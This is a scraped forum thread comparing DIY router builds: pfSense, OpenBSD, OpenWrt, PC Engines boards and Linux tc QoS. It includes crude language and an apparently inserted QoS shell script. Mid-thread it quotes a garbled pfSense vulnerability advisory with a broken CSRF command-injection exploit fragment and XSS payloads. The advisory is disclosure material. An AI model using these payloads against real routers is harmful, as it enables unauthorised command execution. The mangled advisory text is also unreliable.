Building a router from scratch

Ars has a guide to building your own router but it just boils down to

How would Holla Forums do it? Maybe pfsense would do a better job? Or OpenBSD with pf configured manually? How about hardware? I know there's a bunch of ARM bros on here.

ipfire or openwrt

and pcengines hardware

this thread is relevant to my interests

thanks for the suggestions but why choose those?

I use pfsense because it's easy to manage and upgrade, especially good for other coworkers who can't into CLI.

I do manage one OpenBSD box that acts as the primary gateway/vpn server for a multi site WAN.

OpenBSD in the end is probably superior, but you do have to know your shit.

Intel NICs are superior, inb4 botnet, their open source drivers are fantastically supported,

I've had nothing but trouble with linux for routing/vpn, either it's because I'm in BSD mode all day errey day or I just suck and OpenVPN defaults.
Get this and put pfsense on it, it's the exact same as they sell with pfsense but 100 bucks cheaper.

Unrelated, but can anyone point to a better wireless solution than Ubiquiti? I use them in all the stores because they're just too god damn easy but their lack of freedom irks me.

Buy the 2220 and put OpenBSD on it.

Buy the ubiquiti above and install OpenBSD, it's half the price ^O^

The router is one thing, what about the modem?

Just forget the firmware, goy.

MIPS hardware, openwrt.

Probably this depends on distro. IMHO I find all linux distros kinda bloated with useless shit + doing stuff behind my back annoying especially if I am setting up service which I need to do one thing good. Then again this might be my own fault not specific linux-distros problem.

Never used this; AFAIK this is based on FreeBSD, whose pf is kinda "old" compared to current OpenBSD. Some macro features are not implemented etc. But still might be a solid solution. Then again I am not sure if pfsense is based on pf or the other firewall variants which FreeBSD provides.

I would choose this.

Sure why not.

Yes I am biased, but god damn, pf configuration (or anything else the OpenBSD community produces: smtpd/doas/httpd) is fucking great.

I'll save you the trouble and suggest pfSense -

Works better than any Linux router OS I've tried and has a ton of packages (I use Snort and Service Watchdog)

I just built a cheap AM1 system with an Athlon 5150. I then set up iptables and installed gentoo. From there, I set it up as basically some sort of mix between HTPC, emulation machine, and router. It also has some cloud services like owncloud. Most importantly, though, I mount ssh shares when I'm away and still have access to all my music (my upload is shit so I can't stream my own videos to myself).

I'll never go back again.

Linux distro plus manually configured iptables is completely overkill for a router.
I would go with pfsense or openwrt.


Pfsense just werks, easily configurable, well supported, tons of addons/plugins, shitloads of forums dedicated to support. I just wish it played nice with USB NICs, you pretty much need to have 2 network ports for usefulness, which writes off many small form factor devices.

You can have one nic then use vlans to create separate wan and lan ports.

Bit of a cunt but it's a well documented work around.

pcengines has decent coreboot support on their Geode stuff because they open sourced their own BIOS. That should tell you what type of company they are.

I build fairly high-end routers. Linux's networking stack is far superior to OpenBSD's but most people want something easy which is where pfSense shines. Manually configuring a non-trivial QoS setup on Linux and having it perform well is the blackest of magic and very poorly documented.

Superior performance yes but actual config no.

pf and pfsense have spoiled me, iptables is pure cancer.

iptables is fine other than having to roll your own client as it has O(n^2) performance (try adding a few thousand rules and print the time every 100 added). tc is where it becomes Lovecraft. It is an absolute nightmare. Find a person who thinks it is not a nightmare and I guarantee you they've only done tiny configurations with it that don't expose the madness or have never tried to do things as simple as remove a subset of rules without rebuilding. I've written databases that had less sophisticated code than the code I wrote to manage tc, and I wish that was an exaggeration.

OpenBSD has no equivalent to tc that isn't a toy, so it's not like there's much choice. In the BSD world, if you want QoS whose target audience isn't a home user running bittorrent you go the proprietary kernel module route.

i just sort the packets by hand

You can use VLAN's with a single NIC.

you would need layer 3 switches. much cheaper to just get a 4 nic pcie card.

I built my own router/firewall with a gigabyte mini-itx board which has a pentium cpu soldered on it + 2 Gbit NICs (120€ in germany), then bought one each of a PCI and a PCI-E Gbit NIC (5€ each) + a case with integrated power supply (plenty of watts, I think 90) for 80 €.
Installed IPFire on it and have been happy since. Running for almost 2 years now without the need to maintain anything other than firewall rules (regular updates every week on the go).

Also uses strong encryption (x86 hardware encoding).


but what if fpgas contain nsa blobs?

Date: Fri, 15 Apr 2016 14:54:55 +1200
From: Francesco Oddo
Subject: [FD] PfSense Community Edition Multiple Vulnerabilities
Content-Type: text/plain; charset="utf-8"



PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition \' > shellexec')encoded_stager = ''for c in stager: encoded_stager += "\\\\%03d" %(int(oct(ord(c))))print encoded_stager

function sploit() { var query = "database=-throughput.rrd&graph=file|printf[ENCODED_STAGER]|sh|echo "; var xhr = new XMLHttpRequest();"GET", "/status_rrd_graph_img.php?" +query, true); xhr.withCredentials = true; xhr.send(); setTimeout(shellexec, 2000); } function shellexec() { document.csrf_exploit_exec.submit(); }

Cross-site Scripting
Multiple instances of stored and reflected cross-scripting
vulnerabilities exist in the web interface of the application. An
authenticated attacker with limited privileges can run arbitrary
JavaScript code in the context of admin users' session and extend their
access to administrative areas of the application (i.e. command prompt

Param => descr
Method => POST
URL => /system_gateways_edit.php
Payload => alert(1)
Render => /system_gateways_groups_edit.php
Type => Stored

Param => container
Method => POST
URL => /firewall_shaper_layer7.php
Payload => ">alert(1)
Render => /firewall_shaper_layer7.php
Type => Reflected

Param => newname
Method => POST
URL => /firewall_shaper_vinterface.php
Payload => ">alert(1)
Render => /firewall_shaper_vinterface.php
Type => Reflected

| Solution |
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.

| Timeline |
10/02/2016 - Initial disclosure to pfSense.
11/02/2016 - Vendor confirms receipt of advisory and provides fixes.
16/02/1016 - Sent follow up email about public release.
16/02/2016 - Vendor requests advisory disclosure after release of new
software build.
12/04/2016 - Release of patched software build and vendor disclosure of
security advisories.
15/04/2016 - Public disclosure of security advisory.

| Additional |
Further information is available in the accompanying PDF.


You're a sad pepe because pfsense is getting security fixes?


Are there seriously people that use pfsense with the webgateway internet facing?

The only way to remotely manage my pfsense box is to log into its vpn then manage it via the local lan address, I don't even allow remote ssh.

What kind of dumb fuck netadmin would put that obvious mess of a UI on the internet?

No just the webui.


You'll be surprised.

so that's

pfsense x6
openwrt x3
ipfire x2
openbsd (for the brave) x2
notlinux x2
gentoo (this was for a htpc build)

fpga (i think this is a joke)

seems like Holla Forums prefers pfsense but not much mention of hardware choices

What is the point? Just buy a router, much easier and it just works.

still bumping because it's at least technology on the technology board

While there are some valid reasons to build your own router, given the amount of effort and knowledge required I'm going to say that you don't really need a valid reason. People do it because they want to, and they want to just because they can.

If you're talking about QoS for a small home network, then it's easy.
-For upload, Just set up a classful root qdisc (htb is popular nowadays) on the desired interface, then add some classes to it (e.g. htb), each with their own bandwidth, and possibly a good leaf qdisc (e.g. fq_codel to reduce bufferbloat)
-After that, either use the built-in filters in tc to classify (e.g. any field on a packet's ip header, mac addresses), or mark packets using iptables, then add a tc filter for each specified mark.
-For download, redirect traffic to an ifb device, then repeat the above for it.

The only shit I couldn't figure out are the other kinds of tc filters involving the kernel estimator given the scant amount of documentation.

Also, I could never get the burst parameter to work in htb (all classes end up with negative tokens), so I had to disable bandwidth sharing between classes.
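The upload/download recipe in the post above, written out as an added example (mine, not the poster's). The interface names eth0/ifb0, the 900/9000 kbit rates and the three-class split are assumptions; it also covers one caveat the post does not state: the ingress redirect to ifb runs before netfilter, so iptables marks are not visible there and the download side has to use tc's own u32 header matches instead.

```shell
#!/bin/sh
# Added example, not from the thread. Set TC=echo IP=echo IPT=echo to print the
# commands instead of applying them; QOS_APPLY=1 runs main() for real (needs root).
set -eu

TC="${TC:-tc}"; IP="${IP:-ip}"; IPT="${IPT:-iptables}"
WAN="${WAN:-eth0}"            # assumed WAN interface
IFB="${IFB:-ifb0}"            # virtual device that receives redirected ingress traffic
UP_KBIT="${UP_KBIT:-900}"     # keep BELOW the true uplink, or no queue forms and nothing is shaped
DOWN_KBIT="${DOWN_KBIT:-9000}"

# shape DEV TOTAL_KBIT: classful HTB root with three classes and fq_codel leaves.
# HTB leaves default to pfifo, which lets one heavy flow starve its class, so every
# class gets an explicit fq_codel leaf. 1:10 interactive, 1:20 default, 1:30 bulk.
shape() {
    dev=$1; total=$2
    hi=$((total * 40 / 100)); lo=$((total * 20 / 100))
    $TC qdisc del dev "$dev" root 2>/dev/null || true
    $TC qdisc add dev "$dev" root handle 1: htb default 20
    $TC class add dev "$dev" parent 1: classid 1:1 htb rate "${total}kbit" ceil "${total}kbit"
    # each class has a guaranteed rate and may borrow from siblings up to ceil
    $TC class add dev "$dev" parent 1:1 classid 1:10 htb rate "${hi}kbit" ceil "${total}kbit" prio 0
    $TC class add dev "$dev" parent 1:1 classid 1:20 htb rate "${hi}kbit" ceil "${total}kbit" prio 1
    $TC class add dev "$dev" parent 1:1 classid 1:30 htb rate "${lo}kbit" ceil "${total}kbit" prio 2
    for c in 10 20 30; do
        $TC qdisc add dev "$dev" parent "1:$c" handle "$c:" fq_codel
    done
}

# mark_rules: iptables mangle rules that tag outbound packets with fwmarks.
# POSTROUTING runs before the egress qdisc on WAN, so the marks are visible there.
mark_rules() {
    $IPT -t mangle -A POSTROUTING -o "$WAN" -p tcp --dport 22 -j MARK --set-mark 1
    $IPT -t mangle -A POSTROUTING -o "$WAN" -p udp --dport 53 -j MARK --set-mark 1
    $IPT -t mangle -A POSTROUTING -o "$WAN" -p tcp --dport 873 -j MARK --set-mark 3  # rsync = bulk
}

# filters_fw DEV: fwmark N selects class 1:N0 (upload side, marks from mark_rules).
filters_fw() {
    dev=$1
    $TC filter add dev "$dev" parent 1: protocol ip prio 1 handle 1 fw flowid 1:10
    $TC filter add dev "$dev" parent 1: protocol ip prio 1 handle 3 fw flowid 1:30
}

# filters_u32 DEV: download side. Packets reach ifb before netfilter has run, so
# iptables marks are unset here; classify on IP header fields with u32 instead.
filters_u32() {
    dev=$1
    $TC filter add dev "$dev" parent 1: protocol ip prio 1 u32 match ip sport 22 0xffff flowid 1:10
    $TC filter add dev "$dev" parent 1: protocol ip prio 1 u32 match ip sport 53 0xffff flowid 1:10
}

# ingress DEV: redirect everything arriving on DEV to the ifb device, where it can
# be shaped with a normal egress HTB tree (the ingress side itself is classless).
ingress() {
    dev=$1
    $IP link add "$IFB" type ifb 2>/dev/null || true
    $IP link set "$IFB" up
    $TC qdisc del dev "$dev" ingress 2>/dev/null || true
    $TC qdisc add dev "$dev" handle ffff: ingress
    $TC filter add dev "$dev" parent ffff: protocol ip u32 match u32 0 0 \
        action mirred egress redirect dev "$IFB"
}

main() {
    mark_rules
    shape "$WAN" "$UP_KBIT";  filters_fw "$WAN"        # upload
    ingress "$WAN"
    shape "$IFB" "$DOWN_KBIT"; filters_u32 "$IFB"      # download via ifb
}

if [ "${QOS_APPLY:-0}" = 1 ]; then
    main
fi
```

To confirm the rules actually bite, run an iperf upload afterwards and check that `tc -s class show dev eth0` reports drops in the busy class; if it stays at zero, the rate is not below the real link speed.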

Stock router firmwares are shit, and I really mean it:


The issue is in an enterprise firewall environment, where exploitation could occur from either side.

Just to be sure, I can use pfSense as a wifi router and firewall combo? Hopefully the range will be better than the current one. If not, at least it won't be EOL like the current all-in-one box.



but those gate array things are what the NSA uses to get enough processing power to spy on people. they wouldn't need to bd their own shit lol. also normies don't use FPGAs, they use regular shit ass unconfigurable processors that contain integrated 3g spychips

Thanks for the quick reply. Is it possible to DIY a modem which respects my software freedoms? I assume is talking about how both internal and external actors are trying to gain unauthorised access to areas, compared with a home/personal environment where usually only external actors are trying to gain unauthorised access.

Is it possible to DIY a modem
No, even the old VIKING VDSL cards are really just closed off modems with an interface.

Best you can do is if you have something like fibre and then you can do PPPoE directly in pfsense.

Otherwise you will need a modulator and I have found zero open source version of those.

You have a point there, you can still restrict that to an admin vlan... I should probably set that up.

my setup:
-Odroid C1+
-SATA HDD connected via a USB adaptor
-debian image
-haveged because it be doing cryptos and shiiet and my hw rng is broken for some reason
-a separate physical switch to have ethernet LAN because why the hell not? a lot cheaper than devices with multiple eth ports
-a usb WiFi dongle running for wireless LAN
-with ssh and tmux you now have an always online linux system you can access anywhere

underrated post

What about DD-WRT?


I'm talking about QoS for a non-trivial setup, not a home user (all they ever need is a HTB limiter on upload). Managing tc with a lot of filters (a few thousand) and non-awful performance (almost every tutorial does it wrong and will lead to every filter tested for every packet) requires you to write a btree because the kernel makes no attempt to balance the filters across hash tables itself and documentation on the millions of edge cases in the hash table code is almost non-existent. It also gets extremely tricky to make transactional updates - unlike with netfilter there's no underlying transactional interface that can replace all rules simultaneously so you have to carefully engineer a way for it to be effectively transactional. It's a nightmare.
I'd strongly recommend against it, it will fuck up so much software and I learned this the hard way by deploying it and then getting complaints. They monkey with burst such that packets start dropping after about 30 sent near simultaneously. So I had a server that sends tiny heartbeats to connected clients once every 10 seconds and for efficiency reasons this was done with one timer. Once I had more than 30 clients the last clients to connect (so always the last in the datastructure I iterate over) would have their heartbeat dropped by fq_codel. This was a stable pattern (obviously it should not be, but such is the state of fq_codel) and would eventually lead to perfectly healthy clients getting disconnected. I pride myself on my code being perfect and I was furious that fq_codel's retarded design made my code look bad.
Most of the QoS modules on Linux have hidden trainwrecks like that, by the way. Their SFQ implementation has a large, fixed internal buffer of 128 packets that wasn't documented anywhere, although I heard it's now configurable. That's HUGE for consumer-tier connections and will quietly cause disgusting amounts of latency which a lot of people won't notice as they don't know how to check TCP sequence graphs; they'll just run a ping alongside a wrecked TCP session and think nothing's wrong as it looks great.

That answers nothing.

This is the hardware at my disposal. What would you do with it? I don't understand the slightest thing about software & I just play with hardware and embedded things. But I was thinking that I should use bhyve or qubes os to simultaneously run freenas (zfs2 file system) and pfsense (seedbox the server contents) on the server. I guess I can half and half the CPU and pfsense would probably be happy with 512MB-1GB of RAM. But will splitting it asymmetrically cause the ECC to fuck up? I'm happy for pfsense to control the PCI bus, but what about usb bus? I need that for freenas. Can that be shared? How does one share data between two virtual environments running simultaneously on the same machine?

My LAN card supposedly comes with a built-in "bypass switch". I don't even know what that is nevermind how to use it. I also have a bunch of old cisco switches and routers. Essentially I have a whole toy store's worth of toys but I'm wholly ignorant in how to utilize them. Also most of it is expensive stuff and I don't want to trash it.

What could I be doing with it to spread love & joy more than I'm doing now with it sat unused?

Use it to learn the software side of things, if I didn't already know. I'm not a fan of NAS or network services sitting behind a consumer ISP connection.
I have no idea about AMD but AFAIK everything outside of the embedded space has been doing NUMA with multiple memory controllers for 10-15 years and there will be no difference.
They're used for fail-to-wire setups (converts to a switch rather than converts to a brick). Unless you're learning how to build a fault-tolerant setup just avoid it as it will cause unexpected problems that are difficult to debug (like inadvertently bridging two segments for brief moments).

Then what do you recommend to maintain responsiveness (i.e. low latency for interactive stuff), on a small home network?
HTB qdisc and classes alone haven't been cutting it for me (always reports 0 dropped packets). Should I use a sfq qdisc, policing filters, or look into something else entirely?

Asking because I can barely find information beyond


The only thing that really matters for them is throttling upload so they don't fill the path (which can be comically huge when misconfigured). That's night and day improvement as far as users are concerned; if you've set it up right there's no way you'll not notice the effect. Everything else is a micro-optimization at that speed and can be ignored. Now the bad news: without a SLA (so, basically every home network) this won't work reliably as upload speed varies throughout the day. If it dips below what you've throttled it to it is effectively removed. Still, works /ok/ when the alternative is something like MPL$.
You'll need to check your HTB configuration as you should almost immediately see drops when running iperf. Also be sure you understand that you must throttle your connection below its true bandwidth or nothing will ever be dropped and there will be no queue to do queue management on. Try throttling down to like 100Kbit just to be sure you got the rules right. Hit and verify you get the speed you chose.
Yeah, that part of Linux is like that. brouting is pretty poorly documented/understood, too.

I know journalism is pretty much dead, but has some enterprising soul on a technology reporting website gone through the trouble of listing ISPS that allow DIY routers? I feel like building one, but I don't want to have to use an ISP that disallows it.

PCENGINES is by far the cleanest and most compact solution.

5-10W max power consumption. Serial port for console output (I use an ancient PocketPC I bought on ebay as a serial console.... display and keyboard in a tiny package).

The old Alix boards (can be found dirt cheap on eBay all day every day) will do 85-90mbit bidirectionally. Add in some QOS and shit and you still can maintain 65-80mbit depending on complexity.

MAKE SURE YOU GET THE 256MB VERSION! The 128MB version is limited to pfSense 1.x or m0n0wall forks

The new APU boards are a lot more powerful, I would get the newer revision with the quad core APU and 4GB ram. These will do 600+mbit easy.

For software, I like to use m0n0wall (or t1n1wall or smallwall) for the Alix boards. These are fast as shit, very low latency

PFSENSE or OPNSENSE can be used on the APU boards.

In all cases, try to avoid realtek nics. people are saying the drivers are hit or miss depending on chip revision and it could compromise performance.

I have also used Atom boards (NM10, with dual broadcom gigabit) and it worked fine, but a bigger footprint and more noise & heat than the Alix and APU boards.

I have also heard good things about mikrotik routers. dirt cheap for the speed/features of what you get.

People say that the OS is a pain to learn but from screenshots it looks pretty straightforward???

they all should? worst case have the router clone your modem's mac address.

Wow. She's totally obs such xtreme codeher that she needs a 1337 helmet cam.

Been looking for a cheap open source SoC to use as server\router. Did I find a good one?

is there any evidence of this or is it just from intel marketing where they're talking about servers with extra hardware?

I've messed around with Banana Pis before, the company that makes them has no idea what support means. Outside of the original and the Pro I wouldn't recommend getting one. At least it's an Allwinner A20, so it's well documented if you want to build a Linux distro for it.
You might want to consider connecting an SBC with one ethernet port to an ethernet switch. It's slower, but that way you can choose from a wider variety of boards. I use a Cubietruck, because it has 2GB RAM and gigabit ethernet. The Cubieboard 2, Olimex Lime2 A20 and Odroid C1/C1+/C2 are also good choices for a server, and are cheaper than the Cubietruck.
Allwinner's A20 page won't load for me right now, but I'm pretty sure the chip only supports one gigabit ethernet port. I might be wrong, but it's possible lots of these multi-ethernet boards just have a switch built in.

It's conspiracy shit - they support 3g events but coming from attached hardware. It's not built-in. However, I think building it in is the direction they'll go so don't be surprised in a few years when they announce it.

Sure, nothing intel says at this point would really surprise me. But it's really hard to have a proper conversation about this when tinfoilfags make you look retarded by association

Holy shit guy are you asking for a headache? Get a PCEngines or something.


All of them use the same 1.2 Ghz Quad-Core ARM Cortex A53 64-Bit Processor. The $19 version gets double the ram at 1 gig and gbps Ethernet, the $29 Jews you out of 10 more sheckles for 2 gigs of ram and nothing else.

The GPU is a little weaker but more open than the pies.

The pie runs all its shit through a single hubbed out usb channel this board has dedicated gigabit and two usb channels and for me this is quite important because i do alot of intensive usb and network shit at the same time and I get pissed that on my pie everything is always fighting for usb bandwith.

I think the pine64 is the best board for the cost currently avalable. Running 4 hd webcams off one of them now, simultaneously live streaming them and recording on my nas. Cheap enough I think I will buy a few more.

It would take a preeeeeeetty impressive backdoor to analyze your hardware implementation and send back any meaningful data. Now, I don't think Intel would be above doing so if they could, but I simply don't think they can.

Periodically sampling/caching signals throughout the module would only work on trivially small designs, because even at low frequencies (say 10 MHz) something like a small CPU will have a metric shitload of state transitions for all the different registers and nets within it. So, a backdoor would require some sort of semantic understanding of the design, only collecting signals that are "interesting". That's a privilege they have with their own products, but not something they have for all the different stuff you could throw on an FPGA.

do the lights make it go faster?

i use it, its pretty good

Only if they are bright red and built for speed.
What is it like being the king of the ant people?

How would one go around doing such a thing when fibre eventually comes? I assume it is more to it than just "plug fibre cable into first, 1GiB ethernet port then connect to ISP via PPPoE"
Also is there a reason why connecting via PPPoE in pfSense won't work with VDSL(2)?

VDSL PPPoE can be done but you still need a modem in bridged mode

Excellent. That will work out very nicely hopefully.
Any stand out features?


This, at least for mobile processors. As the cost comes down it will be integrated just for the purpose of saving room and lowering overall device costs. Also wouldn't be surprised if SBCs like the Raspberry Pi start including a cellular modem in a few years for the same reason.

Anyone using OPNsense?



If you want a high performant network stack go FreeBSD. I'm curious how Solaris holds up today for such a task.

Just get ubiquiti edgemax. Waste of time building your own that will cost more and perform worse (cavium cpu does routing/nat/pppoe/dpi offload in hardware). Full access to underlying linux for advanced shitz.

Over many years I've used a bunch of off the shelf routers at home, custom firmware, cisco, DIY linux and bsd based routers, and finally found something that does exactly what I want with no BS.

Isn't the code non-free though?

I smell shillary afoot tbh smh.

That's awesome

Does the free bios mean that libreboot support might be possible before the heat death of the sun?

That was pretty much just for corporate class laptops.

Thanks of the laugh.


Now that the FCC is making it illegal to remove NSA backdoors from routers, it's more important than ever to know how to make botnet-less routers. A thread on libre de-botnetted routers deserves to be made a sticky thread.

Did it pop in her eye?!! OUCH

HTB classes default to FIFO qdiscs, which are a definite no-no, as 1 heavy flow will starve a class. You need to specify a leaf qdisc.

Making a basic home router is as easy as slapping 2 gigabit NICs on a low spec PC and installing a router distro. You can even throw in a wireless NIC and host an AP off it.

The real problem is with wireless APs, which will be locked down because of muh radars. This, of course, fucks over any country that's not America (and America too; stock router firmware is shit)

You can somewhat mitigate the botnet problem with the above, but you won't be able to lift the hardcoded restrictions on channels and tx power, even if they don't make any fucking sense for your local area (5600-5650 MHz is legal in the US, but illegal in my region, yet my region-locked router allows picking it. Thanks faggots at FCC)

How can a region-locked router allow access to an illegal option unless this was a recent change?

Because manufacturers and the FCC only give a shit about the US and I can't override the country setting.

No, they aren't, you clueless faggot.

the fuck

Holla Forums software is shit. are you new?



so has anyone tried it as a result of this thread?

the same way.

What the fuck does that mean? Computer comes with builtin ethernet. I just added a $5 USB to ethernet adapter. Now I have a connection to the modem and to the switch.

yes I always wanted an open source version of my do-everything-but-do-nothing-right consumer trash

How to build a router from scratch:


relying on openwrt is like trusting a bunch of game modders to secure your network. just because you can replace the textures in skyrim doesn't mean you know how to build a secure operating system

a $5 usb ethernet adapter is gonna bottleneck your bandwidth. not saying it wouldn't work with usb 3 and a decent adapter but a cheap shit one is going to be cheap shit

I don't even understand how you would fucking get an internet connection without an ISP.

ISPs have brainwashed me.

who said anything about an ISP?
are you assuming every ISP makes you use their router with no option to switch it out?

I'll give it a go in the next few days.


I build routers for a living. You'd be horrified if you knew how insecure and broken the commercial offerings were. Code quality is as low as it gets outside of webdev.

Is there anything lower than webdev besides 1 year third level education in terms of code quality? Also I am not surprised, seeing as the latest security flaw is based off not even security 101 (check inputs) and the advanced level (see if they match expected values).

From scratch? Nah, not for a home setup.

Just buy an old WRT54G for $5 off the flea market / ebay and install dd-wrt on it.

enjoy your 54 mbps transfer speeds retard it isnt 2006 anymore
ddwrt and openwrt are jokes when it comes to real networking
stop buying consumer routers they are trash

I wish, my ISP caps my connection at 10 mbps
Looks like we may finally see pfSense on ARM soon. Relevant tweets: (ignore the retarded replies)

yeah because you cant use transfer data on a local network right ? so who needs a fast router xddd my le isp doesnt let me have that much anywayyy

I am thinking of the two following quad core processors for a NAS and a pfSense box. Would it be better to go with the older generation with a lower TDP or a newer generation with a higher TDP?

AMD 5350: 2.05 GHz, 4 cores, 25 W
AMD A8-7600: 3.1 GHz, 4 cores, 65 W

I am thinking of using the following CPUs, which one would be better suited for 24/7 use? The older generation with a lower TDP or a newer generation with a higher TDP?

AMD 5350: 2.05 GHz, 4 cores, 25 W
AMD A8-7600: 3.1 GHz, 4 cores, 65 W

I posted a slightly differently worded version and haven't received a response in 24hrs. Also bumping this worthwhile thread.

Because you need those 2 4K movies streamed from your NAS playing simultaneously on your dual monitor setup don'tcha? :^)

I'll go with the lower TDP one.

I used a 5150 and it's great. I bought a used Intel 4 port PCIe switch on amazon; the whole thing pulls 20w from the wall and 50w under full load. I used the Asrock motherboard that uses a laptop power supply and just used a spare laptop power supply I had laying around.

Just use a full Linux distro, the guide on the official gentoo wiki is good for a home router and it should work on anything with iptables

Thanks for the reply. I was thinking of going the mini-itx route with a pico PSU and 1.3 volt RAM. Also would it be worthwhile to down clock the APU to 1.8 GHz or so? I am thinking of using pfSense as it is good to have detailed graphs available and I currently don't know how to write iptables.

For those who rely on fq_codel to have an Internet connection that actually works, does this mean that pfSense and other non-Linux router distributions are out of the question?

Really want to stick with pfSense, but I can't eliminate my internet connection's really bad bufferbloat issues.